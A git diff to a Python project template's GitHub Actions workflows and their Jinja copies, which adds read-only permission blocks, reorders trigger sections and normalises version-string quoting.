diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 94a53a71..95ea2a6c 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -6,6 +6,9 @@ on: branches: - main +permissions: + contents: read + concurrency: cancel-in-progress: true group: ${{ github.workflow }}-${{ github.ref }} @@ -42,11 +45,11 @@ jobs: # renovate: github-runner - windows-2025 python-version: - - '3.9' - - '3.10' - - '3.11' - - '3.12' - - '3.13' + - "3.9" + - "3.10" + - "3.11" + - "3.12" + - "3.13" consistency: if: ${{ !cancelled() && ! failure() }} runs-on: ubuntu-24.04 diff --git a/.github/workflows/commitlint.yml b/.github/workflows/commitlint.yml index 90228950..f62e452c 100644 --- a/.github/workflows/commitlint.yml +++ b/.github/workflows/commitlint.yml @@ -1,7 +1,23 @@ name: CommitLint + +on: + pull_request: + types: + - opened + - synchronize + - reopened + - edited + push: + branches: + - main + +permissions: + contents: read + concurrency: cancel-in-progress: true group: ${{ github.workflow }}-${{ github.ref }} + jobs: commitlint: container: @@ -15,13 +31,3 @@ jobs: - name: Validate pull request title with commitlint if: github.event_name == 'pull_request' run: echo "${{ github.event.pull_request.title }}" | npx commitlint -x @commitlint/config-conventional -on: - pull_request: - types: - - opened - - synchronize - - reopened - - edited - push: - branches: - - main diff --git a/.github/workflows/readthedocs-preview.yml b/.github/workflows/readthedocs-preview.yml index 3ea507b9..3636dab4 100644 --- a/.github/workflows/readthedocs-preview.yml +++ b/.github/workflows/readthedocs-preview.yml @@ -1,15 +1,5 @@ name: Read the Docs Pull Request Preview -concurrency: - cancel-in-progress: true - group: ${{ github.workflow }}-${{ github.ref }} -jobs: - documentation-links: - runs-on: ubuntu-24.04 - steps: - - name: Add Read the Docs preview's link to pull request - uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5 - with: - project-slug: ss-python + on: pull_request_target: types: @@ -22,5 +12,19 @@ on: - docs/** - pdm.dev.lock - pdm.lock + permissions: pull-requests: write + +concurrency: + cancel-in-progress: true + group: ${{ github.workflow }}-${{ github.ref }} + +jobs: + documentation-links: + runs-on: ubuntu-24.04 + steps: + - name: Add Read the Docs preview's link to pull request + uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5 + with: + project-slug: ss-python diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 40a44fcc..b3bcd3a8 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -5,6 +5,9 @@ on: types: - published +permissions: + contents: read + concurrency: cancel-in-progress: true group: ${{ github.workflow }}-${{ github.ref }} @@ -21,7 +24,7 @@ jobs: uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3 with: cache: true - python-version: '3.12' + python-version: "3.12" version: 2.24.1 cache-dependency-path: | ./pdm.dev.lock @@ -111,11 +114,11 @@ jobs: strategy: matrix: python-version: - - '3.9' - - '3.10' - - '3.11' - - '3.12' - - '3.13' + - "3.9" + - "3.10" + - "3.11" + - "3.12" + - "3.13" package-publish: runs-on: ubuntu-24.04 permissions: @@ -128,7 +131,7 @@ jobs: uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3 with: cache: true - python-version: '3.12' + python-version: "3.12" version: 2.24.1 cache-dependency-path: | ./pdm.dev.lock diff --git a/.github/workflows/renovate.yml b/.github/workflows/renovate.yml index 1f940db8..660ea5ae 100644 --- a/.github/workflows/renovate.yml +++ b/.github/workflows/renovate.yml @@ -1,4 +1,16 @@ name: Renovate + +on: + schedule: + # * is a special character in YAML so you have to quote this string + - cron: "*/15 0-3 * * 1" + workflow_dispatch: null + +permissions: + contents: read + issues: write + pull-requests: write + jobs: renovate: container: @@ -46,8 +58,3 @@ jobs: else renovate $RENOVATE_EXTRA_FLAG fi -on: - schedule: - # * is a special character in YAML so you have to quote this string - - cron: "*/15 0-3 * * 1" - workflow_dispatch: null diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja index 15b7f5cf..0a2eb33b 100644 --- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja +++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/ci.yml.jinja @@ -7,6 +7,9 @@ on: branches: - main +permissions: + contents: read + concurrency: cancel-in-progress: true group: {{ '${{ github.workflow }}-${{ github.ref }}' }} @@ -50,19 +53,19 @@ jobs: {% endif %} python-version: {% if version_between("3.9", min_py, max_py) %} - - '3.9' + - "3.9" {% endif %} {% if version_between("3.10", min_py, max_py) %} - - '3.10' + - "3.10" {% endif %} {% if version_between("3.11", min_py, max_py) %} - - '3.11' + - "3.11" {% endif %} {% if version_between("3.12", min_py, max_py) %} - - '3.12' + - "3.12" {% endif %} {% if version_between("3.13", min_py, max_py) %} - - '3.13' + - "3.13" {% endif %} {% if project_name == "Serious Scaffold Python" %} consistency: diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml index 90228950..f62e452c 100644 --- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml +++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/commitlint.yml @@ -1,7 +1,23 @@ name: CommitLint + +on: + pull_request: + types: + - opened + - synchronize + - reopened + - edited + push: + branches: + - main + +permissions: + contents: read + concurrency: cancel-in-progress: true group: ${{ github.workflow }}-${{ github.ref }} + jobs: commitlint: container: @@ -15,13 +31,3 @@ jobs: - name: Validate pull request title with commitlint if: github.event_name == 'pull_request' run: echo "${{ github.event.pull_request.title }}" | npx commitlint -x @commitlint/config-conventional -on: - pull_request: - types: - - opened - - synchronize - - reopened - - edited - push: - branches: - - main diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja index dcd5a01a..6a48cbd5 100644 --- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja +++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/readthedocs-preview.yml.jinja @@ -1,15 +1,5 @@ name: Read the Docs Pull Request Preview -concurrency: - cancel-in-progress: true - group: {{ '${{ github.workflow }}-${{ github.ref }}' }} -jobs: - documentation-links: - runs-on: ubuntu-24.04 - steps: - - name: Add Read the Docs preview's link to pull request - uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5 - with: - project-slug: {{ repo_name }} + on: pull_request_target: types: @@ -22,5 +12,19 @@ on: - docs/** - pdm.dev.lock - pdm.lock + permissions: pull-requests: write + +concurrency: + cancel-in-progress: true + group: {{ '${{ github.workflow }}-${{ github.ref }}' }} + +jobs: + documentation-links: + runs-on: ubuntu-24.04 + steps: + - name: Add Read the Docs preview's link to pull request + uses: readthedocs/actions/preview@b8bba1484329bda1a3abe986df7ebc80a8950333 # v1.5 + with: + project-slug: {{ repo_name }} diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja index 60d1bb81..c9a027a0 100644 --- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja +++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/release.yml.jinja @@ -6,6 +6,9 @@ on: types: - published +permissions: + contents: read + concurrency: cancel-in-progress: true group: {{ '${{ github.workflow }}-${{ github.ref }}' }} @@ -22,7 +25,7 @@ jobs: uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3 with: cache: true - python-version: '{{ default_py }}' + python-version: "{{ default_py }}" version: 2.24.1 cache-dependency-path: | ./pdm.dev.lock @@ -113,19 +116,19 @@ jobs: matrix: python-version: {% if version_between("3.9", min_py, max_py) %} - - '3.9' + - "3.9" {% endif %} {% if version_between("3.10", min_py, max_py) %} - - '3.10' + - "3.10" {% endif %} {% if version_between("3.11", min_py, max_py) %} - - '3.11' + - "3.11" {% endif %} {% if version_between("3.12", min_py, max_py) %} - - '3.12' + - "3.12" {% endif %} {% if version_between("3.13", min_py, max_py) %} - - '3.13' + - "3.13" {% endif %} package-publish: runs-on: ubuntu-24.04 @@ -139,7 +142,7 @@ jobs: uses: pdm-project/setup-pdm@deb8d8a4e2a03aabcef6f2cc981923fc6b29ef99 # v4.3 with: cache: true - python-version: '{{ default_py }}' + python-version: "{{ default_py }}" version: 2.24.1 cache-dependency-path: | ./pdm.dev.lock diff --git a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja index 7fe17e51..84d38d22 100644 --- a/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja +++ b/template/{% if repo_platform == 'github' %}.github{% endif %}/workflows/renovate.yml.jinja @@ -1,4 +1,16 @@ name: Renovate + +on: + schedule: + # * is a special character in YAML so you have to quote this string + - cron: "*/15 0-3 * * 1" + workflow_dispatch: null + +permissions: + contents: read + issues: write + pull-requests: write + jobs: renovate: container: @@ -50,8 +62,3 @@ jobs: else renovate $RENOVATE_EXTRA_FLAG fi -on: - schedule: - # * is a special character in YAML so you have to quote this string - - cron: "*/15 0-3 * * 1" - workflow_dispatch: null